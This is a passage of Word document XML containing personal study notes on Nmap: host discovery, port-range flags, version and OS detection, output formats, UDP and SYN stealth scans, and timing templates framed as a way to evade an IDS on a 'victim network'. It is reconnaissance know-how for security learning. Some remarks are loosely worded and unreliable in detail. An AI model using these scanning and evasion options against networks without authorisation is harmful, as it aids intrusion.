          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>NMAP – Network Mapper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3890EDE0" w14:textId="77777777" w:rsidR="001160EA" w:rsidRPr="002A77BD" w:rsidRDefault="001160EA" w:rsidP="001160EA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17276B3B" w14:textId="3C6CFD51" w:rsidR="001160EA" w:rsidRPr="002A77BD" w:rsidRDefault="001160EA" w:rsidP="001160EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Discover systems or hosts on a network that you are connected to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50706951" w14:textId="20036D13" w:rsidR="001160EA" w:rsidRPr="002A77BD" w:rsidRDefault="001160EA" w:rsidP="001160EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Swiss-army knife when coming down to host discovery and device discovery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526563C6" w14:textId="77777777" w:rsidR="001160EA" w:rsidRPr="002A77BD" w:rsidRDefault="001160EA" w:rsidP="001160EA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67184F83" w14:textId="496BACA2" w:rsidR="001160EA" w:rsidRPr="002A77BD" w:rsidRDefault="001160EA" w:rsidP="001160EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“ip a s” – Displays your host information and subnet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4759B50D" w14:textId="77777777" w:rsidR="001160EA" w:rsidRPr="002A77BD" w:rsidRDefault="001160EA" w:rsidP="001160EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14B4C8AD" w14:textId="67DFC904" w:rsidR="001160EA" w:rsidRPr="002A77BD" w:rsidRDefault="001160EA" w:rsidP="001160EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“sudo nmap -sn (no port scan)” – Often referred to as a ping scan (SYN-443, ACK-</w:t>
      </w:r>
      <w:r w:rsidR="00794BE8" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>80, ICMP</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55184424" w14:textId="77777777" w:rsidR="001160EA" w:rsidRPr="002A77BD" w:rsidRDefault="001160EA" w:rsidP="001160EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D44D7D0" w14:textId="3CC033DA" w:rsidR="001160EA" w:rsidRPr="002A77BD" w:rsidRDefault="001160EA" w:rsidP="001160EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Scanning a 0/24 server will </w:t>
      </w:r>
      <w:r w:rsidR="00794BE8" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>generally</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ALWAYS discover devices such as the router/default gateway (.1), your workstation (actual host, generally .2 on VMs), and then your VM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E17C509" w14:textId="112A9D99" w:rsidR="00794BE8" w:rsidRPr="002A77BD" w:rsidRDefault="00794BE8" w:rsidP="00794BE8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="004E78CA" w14:textId="1D958A2F" w:rsidR="00794BE8" w:rsidRPr="002A77BD" w:rsidRDefault="00794BE8" w:rsidP="00794BE8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>+++++++</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7779CB22" w14:textId="3D332FB8" w:rsidR="00794BE8" w:rsidRPr="002A77BD" w:rsidRDefault="00794BE8" w:rsidP="00794BE8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">A default NMAP scan will conduct a SYN scan on the 1000 most </w:t>
      </w:r>
      <w:r w:rsidR="00840148" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>common</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ports</w:t>
      </w:r>
      <w:r w:rsidR="00840148" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8BA988" w14:textId="16EA8BFB" w:rsidR="00794BE8" w:rsidRPr="002A77BD" w:rsidRDefault="00794BE8" w:rsidP="00794BE8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>If a host displays that it is down, that might be because it is a Windows target system that is blocking ICMP requests or ICMP probes. (As explained in the result of the default scan)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5457BDED" w14:textId="0B3073FA" w:rsidR="00794BE8" w:rsidRPr="002A77BD" w:rsidRDefault="00794BE8" w:rsidP="00794BE8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“nmap -Pn (IP ADDRESS)”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B446E9" w14:textId="77777777" w:rsidR="00794BE8" w:rsidRPr="002A77BD" w:rsidRDefault="00794BE8" w:rsidP="00794BE8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16097591" w14:textId="00C7D4CD" w:rsidR="00794BE8" w:rsidRPr="002A77BD" w:rsidRDefault="00794BE8" w:rsidP="00794BE8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Displays port, state, and service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B48DE40" w14:textId="77777777" w:rsidR="00794BE8" w:rsidRPr="002A77BD" w:rsidRDefault="00794BE8" w:rsidP="00794BE8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3945F15A" w14:textId="78FD3B90" w:rsidR="00794BE8" w:rsidRPr="002A77BD" w:rsidRDefault="00420090" w:rsidP="00794BE8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidR="00794BE8" w:rsidRPr="002A77BD">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          </w:rPr>
          <w:t>https://en.wikipedia.org/wiki/List_of_TCP_and_UDP_port_numbers</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7DA9D414" w14:textId="77777777" w:rsidR="00794BE8" w:rsidRPr="002A77BD" w:rsidRDefault="00794BE8" w:rsidP="00794BE8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DD28DB2" w14:textId="5C54E3A7" w:rsidR="00840148" w:rsidRPr="002A77BD" w:rsidRDefault="00840148" w:rsidP="00840148">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“-p-“(Discover all ports 0-65535)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF8DB76" w14:textId="52E8E845" w:rsidR="00840148" w:rsidRPr="002A77BD" w:rsidRDefault="00840148" w:rsidP="00840148">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“-p 80,445,3389” (Discover multiple different ports)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E81935" w14:textId="3722D7A1" w:rsidR="00840148" w:rsidRPr="002A77BD" w:rsidRDefault="00840148" w:rsidP="00840148">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“-p 21” (Discover one individual port)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6243D778" w14:textId="5F49788E" w:rsidR="00840148" w:rsidRPr="002A77BD" w:rsidRDefault="00840148" w:rsidP="00840148">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“-p1-1000” (Discover port range)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609BCFED" w14:textId="63A2D24B" w:rsidR="00840148" w:rsidRPr="002A77BD" w:rsidRDefault="00840148" w:rsidP="00840148">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“-F” (Discover most used 100 ports on the target system)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DEF48F" w14:textId="1F61DD0C" w:rsidR="00840148" w:rsidRPr="002A77BD" w:rsidRDefault="00840148" w:rsidP="00840148">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“-vv” (Verbose, will display discovered ports WHEN they are discovered during scan)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61555CDB" w14:textId="5EDD1F32" w:rsidR="00840148" w:rsidRPr="002A77BD" w:rsidRDefault="00840148" w:rsidP="00840148">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“-sV” (Discover service version, will make port scan slower)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F290A9" w14:textId="0E3D42A6" w:rsidR="00840148" w:rsidRPr="002A77BD" w:rsidRDefault="00840148" w:rsidP="00840148">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“-O” (Discover operating system)</w:t>
      </w:r>
      <w:r w:rsidR="001906B8" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Not always conclusive/accurate)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33560DBB" w14:textId="1C79FEA5" w:rsidR="001906B8" w:rsidRPr="002A77BD" w:rsidRDefault="001906B8" w:rsidP="00840148">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“-sC” (Use default NMAP scripts to enumerate more information on the ports)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C3E99E" w14:textId="7739CA31" w:rsidR="00290177" w:rsidRPr="002A77BD" w:rsidRDefault="00290177" w:rsidP="00840148">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“-oN” (Normal way to output to a text file)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BF957C" w14:textId="07BCA840" w:rsidR="00290177" w:rsidRPr="002A77BD" w:rsidRDefault="00290177" w:rsidP="00840148">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“-oX” (.XML format, can be imported into frameworks such as Metasploit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775F38F8" w14:textId="4AEEC6E4" w:rsidR="00290177" w:rsidRPr="002A77BD" w:rsidRDefault="00290177" w:rsidP="00840148">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“-oA (Stores normal, .XML, and greppable file formats at once, stored as .nmap file)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728E6203" w14:textId="5B848C8B" w:rsidR="001906B8" w:rsidRPr="002A77BD" w:rsidRDefault="001906B8" w:rsidP="00840148">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">“-T paranoid | sneaky | polite | normal | aggressive | insane” (Timing template to slow down </w:t>
      </w:r>
      <w:r w:rsidR="00290177" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>scan (</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>potential IDS/IPS present on</w:t>
      </w:r>
      <w:r w:rsidR="00290177" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> victim</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> network) or speed up scan(no IDS on victim</w:t>
      </w:r>
      <w:r w:rsidR="00290177" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> network</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C97B48" w14:textId="5118CF40" w:rsidR="00290177" w:rsidRPr="002A77BD" w:rsidRDefault="00290177" w:rsidP="00290177">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>T5 or T4 is generally not recommended on a public-facing network, T5 can send results and be considered a DoS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC64581" w14:textId="77777777" w:rsidR="00840148" w:rsidRPr="002A77BD" w:rsidRDefault="00840148" w:rsidP="00840148">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B40752B" w14:textId="1F582989" w:rsidR="00840148" w:rsidRPr="002A77BD" w:rsidRDefault="00840148" w:rsidP="00840148">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“-sU” (UDP scan instead of TCP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A391CE" w14:textId="4489C304" w:rsidR="00864391" w:rsidRPr="002A77BD" w:rsidRDefault="00864391" w:rsidP="00864391">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>This scan is relatively slow, use “—top-port (amount)” to only scan the top ports and make this scan faster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399EFD78" w14:textId="77777777" w:rsidR="001906B8" w:rsidRPr="002A77BD" w:rsidRDefault="001906B8" w:rsidP="001906B8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="361408B6" w14:textId="5B1B6CDA" w:rsidR="001906B8" w:rsidRPr="002A77BD" w:rsidRDefault="001906B8" w:rsidP="00840148">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>-“sS” (SYN stealth scan)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B59DA1" w14:textId="77777777" w:rsidR="001906B8" w:rsidRPr="002A77BD" w:rsidRDefault="001906B8" w:rsidP="001906B8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57190A86" w14:textId="7AE09575" w:rsidR="001906B8" w:rsidRPr="002A77BD" w:rsidRDefault="001906B8" w:rsidP="00840148">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“-A” (Aggressive scan, will combine -sV, -O, -sC into one command)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E205AF" w14:textId="77777777" w:rsidR="00840148" w:rsidRPr="002A77BD" w:rsidRDefault="00840148" w:rsidP="00840148">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38BB34B6" w14:textId="101D2C8E" w:rsidR="00840148" w:rsidRPr="002A77BD" w:rsidRDefault="00840148" w:rsidP="00840148">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
